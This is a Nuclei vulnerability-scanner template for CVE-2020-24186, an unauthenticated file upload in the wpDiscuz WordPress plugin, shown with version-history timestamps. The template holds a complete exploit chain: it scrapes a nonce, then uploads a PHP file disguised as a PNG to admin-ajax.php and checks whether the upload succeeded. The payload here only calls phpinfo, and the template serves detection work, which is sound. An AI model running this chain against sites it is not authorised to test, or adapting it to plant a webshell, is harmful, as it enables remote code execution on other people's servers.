nuclei-templates/cves/2020/CVE-2020-24186.yaml

84 lines
2.4 KiB
YAML
Raw Normal View History

2021-02-28 07:23:43 +00:00
id: CVE-2020-24186
info:
2021-03-14 14:17:36 +00:00
name: Unauthenticated File upload wpDiscuz WordPress plugin RCE
2021-02-28 07:23:43 +00:00
author: Ganofins
2021-03-14 14:18:25 +00:00
severity: critical
2021-02-28 07:23:43 +00:00
description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable sites server.
reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
2021-03-14 14:17:36 +00:00
tags: cve,cve2020,wordpress,wp-plugin,rce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.00
cve-id: CVE-2020-24186
cwe-id: CWE-434
2021-02-28 07:23:43 +00:00
requests:
- raw:
2021-03-14 14:17:36 +00:00
- |
GET /?p=1 HTTP/1.1
Host: {{Hostname}}
Accept: */*
2021-02-28 07:23:43 +00:00
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
2021-03-14 14:17:36 +00:00
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
Origin: {{BaseURL}}
Referer: {{BaseURL}}
2021-02-28 07:23:43 +00:00
2021-03-14 14:17:36 +00:00
------WebKitFormBoundary88AhjLimsDMHU1Ak
2021-02-28 07:23:43 +00:00
Content-Disposition: form-data; name="action"
2021-03-14 14:20:00 +00:00
2021-02-28 07:23:43 +00:00
wmuUploadFiles
2021-03-14 14:17:36 +00:00
------WebKitFormBoundary88AhjLimsDMHU1Ak
2021-02-28 07:23:43 +00:00
Content-Disposition: form-data; name="wmu_nonce"
2021-03-14 14:20:00 +00:00
2021-03-14 14:17:36 +00:00
{{wmuSecurity}}
------WebKitFormBoundary88AhjLimsDMHU1Ak
2021-02-28 07:23:43 +00:00
Content-Disposition: form-data; name="wmuAttachmentsData"
2021-03-14 14:20:00 +00:00
2021-02-28 07:23:43 +00:00
undefined
2021-03-14 14:17:36 +00:00
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php"
Content-Type: image/png
2021-03-14 14:23:07 +00:00
2021-03-14 14:17:36 +00:00
{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
2021-02-28 07:23:43 +00:00
<?php phpinfo();?>
2021-03-14 14:17:36 +00:00
------WebKitFormBoundary88AhjLimsDMHU1Ak
2021-02-28 07:23:43 +00:00
Content-Disposition: form-data; name="postId"
2021-03-14 14:20:00 +00:00
2021-03-14 14:17:36 +00:00
1
------WebKitFormBoundary88AhjLimsDMHU1Ak--
2021-02-28 07:23:43 +00:00
2021-03-14 14:17:36 +00:00
extractors:
- type: regex
part: body
internal: true
name: wmuSecurity
group: 1
regex:
- 'wmuSecurity":"([a-z0-9]+)'
2021-02-28 07:23:43 +00:00
2021-03-14 14:17:36 +00:00
- type: regex
part: body
group: 1
regex:
- '"url":"([a-z:\\/0-9-.]+)"'
matchers-condition: and
2021-02-28 07:23:43 +00:00
matchers:
- type: status
status:
- 200
2021-03-14 14:17:36 +00:00
- type: word
words:
- 'success":true'
- 'fullname'
- 'shortname'
- 'url'
condition: and
part: body